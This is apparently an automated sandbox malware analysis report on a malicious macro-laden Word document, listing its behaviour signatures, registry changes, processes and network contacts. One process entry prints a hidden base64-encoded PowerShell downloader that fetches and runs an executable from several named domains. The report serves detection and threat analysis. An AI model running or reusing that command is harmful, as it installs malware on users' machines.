Malware Analysis Report

2024-12-07 15:22

Sample ID 241113-zxtd4ssmem
Target 5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090
SHA256 5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090
Tags
macro discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090

Threat Level: Known bad

The file 5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090 was found to be: Known bad.

Malicious Activity Summary

macro discovery execution

Process spawned unexpected child process

Blocklisted process makes network request

Suspicious Office macro

Command and Scripting Interpreter: PowerShell

Drops file in System32 directory

Drops file in Windows directory

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 21:06

Signatures

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 21:06

Reported

2024-11-13 21:07

Platform

win7-20240903-en

Max time kernel

55s

Max time network

19s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090.doc"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{028C805A-7B61-4866-92D8-78C2D6D28409}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{028C805A-7B61-4866-92D8-78C2D6D28409}\2.0\FLAGS C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\TypeLib\{028C805A-7B61-4866-92D8-78C2D6D28409}\2.0 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\TypeLib\{028C805A-7B61-4866-92D8-78C2D6D28409} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{028C805A-7B61-4866-92D8-78C2D6D28409}\2.0 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090.doc"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe

Powershell -w hidden -en JABQAGUAZwB4AGkAagByAGsAdgBwAD0AJwBEAGUAbgBsAGsAdQB3AGQAdQBmAHoAJwA7ACQAUABhAHAAbgBvAHkAZABzAHgAIAA9ACAAJwA1ADEAMQAnADsAJABHAGwAegBpAGEAZwBwAGoAPQAnAEYAZQBkAHIAeQB2AHQAbwBhAG4AJwA7ACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUABhAHAAbgBvAHkAZABzAHgAKwAnAC4AZQB4AGUAJwA7ACQAQQBtAHMAeQBiAGMAcgBrAGYAPQAnAEkAYwBmAGsAbgBwAGkAeQAnADsAJABKAG8AawBzAHYAcQB5AHYAeQBtAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBCAGMAbABJAGUAbgBUADsAJABKAHUAeABkAHIAaABoAGoAdABpAD0AJwBoAHQAdABwADoALwAvAHQAaABlAGEAdQBzAHQAaQBuAG8AYwBoAHUAawBzAC4AYwBvAG0ALwBwAGUAcgBzAG8AbgBhAGwAXwBhAHIAcgBhAHkALwBrAHYAcgBtAGkAZgAvACoAaAB0AHQAcAA6AC8ALwBzAGEAcgBhAGYAaQBmAGEAbABsAGEAaABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB1AFUAWAB0AHAATABoAEkALwAqAGgAdAB0AHAAOgAvAC8AZgBhAHUAcwB0AG8AcwBhAHIAbABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBtAFkAWgBXADAALwAqAGgAdAB0AHAAOgAvAC8AagBhAG4AZQBqAGEAaABhAG4ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHEAaQB3ADEAdQA5AC8AKgBoAHQAdABwADoALwAvAHYAaQBrAHMAdABvAHIAeQAuAGMAYQAvAGgALwBmADIAYwBnAFIAdgB3AC8AJwAuACIAcwBgAHAAbABJAHQAIgAoACcAKgAnACkAOwAkAEMAZgBnAHEAZQBlAHoAbAA9ACcASQBvAHkAawBtAHAAYwBlAG0AcgAnADsAZgBvAHIAZQBhAGMAaAAoACQARAB4AG0AZgB4AHQAYQB1AGUAYwB4AHAAdAAgAGkAbgAgACQASgB1AHgAZAByAGgAaABqAHQAaQApAHsAdAByAHkAewAkAEoAbwBrAHMAdgBxAHkAdgB5AG0ALgAiAEQAbwBgAFcATgBMAG8AQQBkAGYAYABJAGAATABlACIAKAAkAEQAeABtAGYAeAB0AGEAdQBlAGMAeABwAHQALAAgACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgApADsAJABMAGQAdgBvAHMAbABnAHoAcwA9ACcARwB5AGgAbABoAHcAeQByAHkAdQBoACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgApAC4AIgBsAGUAbgBgAEcAYABUAEgAIgAgAC0AZwBlACAAMwAzADkAOAAyACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAEwAdABlAHUAdgBzAHEAbQBiAGwAYQBxAGYAKQA7ACQAVgB4AHgAbQBkAG0AYwBpAD0AJwBEAHYAcQBsAG8AZQBsAHUAdAB4AHIAbQAnADsAYgByAGUAYQBrADsAJABWAGkAbwB6AHUAbQBlAGwAPQAnAFgAbgBqAG4AbwBjAG8AeQBkAG0AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwBtAGQAdQBqAG0AeQB3AG0AaQA9ACcAUQB2AHgAYwBvAGoAcABzAHUAZwBvAGEAJwA=

Network

Country Destination Domain Proto
US 8.8.8.8:53 theaustinochuks.com udp
US 8.8.8.8:53 sarafifallahi.com udp
US 8.8.8.8:53 faustosarli.com udp
US 172.67.190.216:80 faustosarli.com tcp
US 8.8.8.8:53 www.faustosarli.com udp
US 172.67.190.216:443 www.faustosarli.com tcp
US 8.8.8.8:53 janejahan.com udp
US 76.223.54.146:80 janejahan.com tcp
US 8.8.8.8:53 vikstory.ca udp

Files

memory/2868-0-0x000000002F801000-0x000000002F802000-memory.dmp

memory/2868-2-0x0000000070E2D000-0x0000000070E38000-memory.dmp

memory/2868-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2868-7-0x0000000005BE0000-0x0000000005CE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1F274FB.wmf

MD5 ce49ee3415ccfe20542c60e539dfd349
SHA1 d664bdd7102a83cd8b8a7225cc350ed7e263431f
SHA256 b04fd90eccc2810015b46274f29feb1aae32b34ba7f5a0b0a5227d4d22ec61ab
SHA512 ae1ac111887f92ddf3a551630b96556776d838a2c3611a03802021ec1ed199671f4015956ebed2942d34e0977434e3c9e76e194e823d06ee4f3795612b31ea36

memory/2868-16-0x0000000005DC0000-0x0000000005EC0000-memory.dmp

memory/2868-23-0x0000000005DC0000-0x0000000005EC0000-memory.dmp

memory/2868-24-0x0000000005DC0000-0x0000000005EC0000-memory.dmp

memory/2868-27-0x0000000005DC0000-0x0000000005EC0000-memory.dmp

memory/2168-33-0x000000001B560000-0x000000001B842000-memory.dmp

memory/2168-34-0x00000000021D0000-0x00000000021D8000-memory.dmp

memory/2868-41-0x0000000070E2D000-0x0000000070E38000-memory.dmp

memory/2868-42-0x0000000005BE0000-0x0000000005CE0000-memory.dmp

memory/2868-43-0x0000000005DC0000-0x0000000005EC0000-memory.dmp

memory/2868-44-0x0000000005DC0000-0x0000000005EC0000-memory.dmp

memory/2868-45-0x0000000005DC0000-0x0000000005EC0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 21:06

Reported

2024-11-13 21:07

Platform

win10v2004-20241007-en

Max time kernel

47s

Max time network

39s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090.doc" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4764 wrote to memory of 1688 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\splwow64.exe
PID 4764 wrote to memory of 1688 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\splwow64.exe

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090.doc" /o ""

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe

